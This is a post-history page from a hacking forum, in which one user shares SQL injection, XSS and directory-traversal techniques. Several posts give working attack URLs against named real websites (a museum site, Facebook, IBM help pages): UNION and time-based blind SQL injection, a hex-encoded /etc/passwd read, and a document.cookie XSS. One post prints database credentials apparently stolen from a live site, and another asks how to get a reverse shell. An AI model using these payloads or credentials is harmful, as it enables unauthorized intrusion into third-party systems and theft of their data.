Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 1
Results 1 - 11 of 11
4 years ago
hc0de
i think ethical hackers don't attempt to hack websites of others..
Forum: SQL and Code Injection
4 years ago
hc0de
lol i include '../details.php' and access source code ^^ $query = "SELECT U_WriteDate, U_Pid,U_artworkdescriptions, U_title, U_StartDate, U_EndDate, U_id, U_thumb, U_Venue,U_description, U_link,U_id,U_linkdoc,U_linkdocTop FROM TBLEXHIBITION WHERE U_id = $id"; and config2.php: $dbhost = 'localhost'; $dbuser = 'singart_singuser'; $dbpass = 'artlover'; $dbname = 'singart_main
Forum: SQL and Code Injection
4 years ago
hc0de
its have waf i think :) but i found another nice point http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 = '../../../../../etc/passwd' look at this; http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+
Forum: SQL and Code Injection
4 years ago
hc0de
are you try url encoded values of this chars?? %2e%2e%2f %25c0%25ae%25c0%25ae%25c0%25af etc.. give a chance to fuzzing :)
Forum: SQL and Code Injection
4 years ago
hc0de
Does anybody realized it? When u search something on facebook, facebook sanitize your search query/input only with addslashes (i think). http://www.facebook.com/search/?q=<script>alert('XSS')</script> If you go this address source will contaion your search input like this. ... , null, \"<script>alert('XSS')<\\\/script>\"); ;"] ... it seems it ca
Forum: XSS Info
4 years ago
hc0de
... $test = str_replace("\r\n", "<br />", $test); ... its convert CRLF to <br> tag it convert the php code to html code
Forum: SQL and Code Injection
4 years ago
hc0de
are you try other variants of the "../" ? look at this list http://shlominar.50webs.com/dirTraversal.html maybe one of them can help you, and i coded a simple tool that fuzz this chars.. http://www.2shared.com/file/zjy8llYY/DT-Fuzzer-v10.html
Forum: SQL and Code Injection
4 years ago
hc0de
re u try include "EVIL" file from remote host?
Forum: SQL and Code Injection
4 years ago
hc0de
its already allow time-based bsqli forum_ans.php?id=58 and IF((ascii(mid(database(),1,1))=116),sleep(5),0) lol
Forum: SQL and Code Injection
4 years ago
hc0de
hi everybody, i have found bugs @ ibm aix compiler help pages.. 1) frame injection : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=http://www.google.com 2) xss : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=../%27%3E%3Cframe%20onLoad=%27alert%28document.cookie%29 3) directory traversal : http://publib.boulder.ibm.com/infocenter/comph
Forum: Bugs
4 years ago
hc0de
hello sla.ckers, i have one question about sql injection. i inject the sql codes on the mysql db and get the database version, user of the db, data directory. after i try load_file function and its work. i load some files /etc/passwd , /etc/hosts , /etc/issue vs.. but what can i do after this steps? can i get reverse shell at machine? /etc/issue Ubuntu 8.04.3 LTS DB VERSION : 5.0.51a-3
Forum: SQL and Code Injection
Current Page: 1 of 1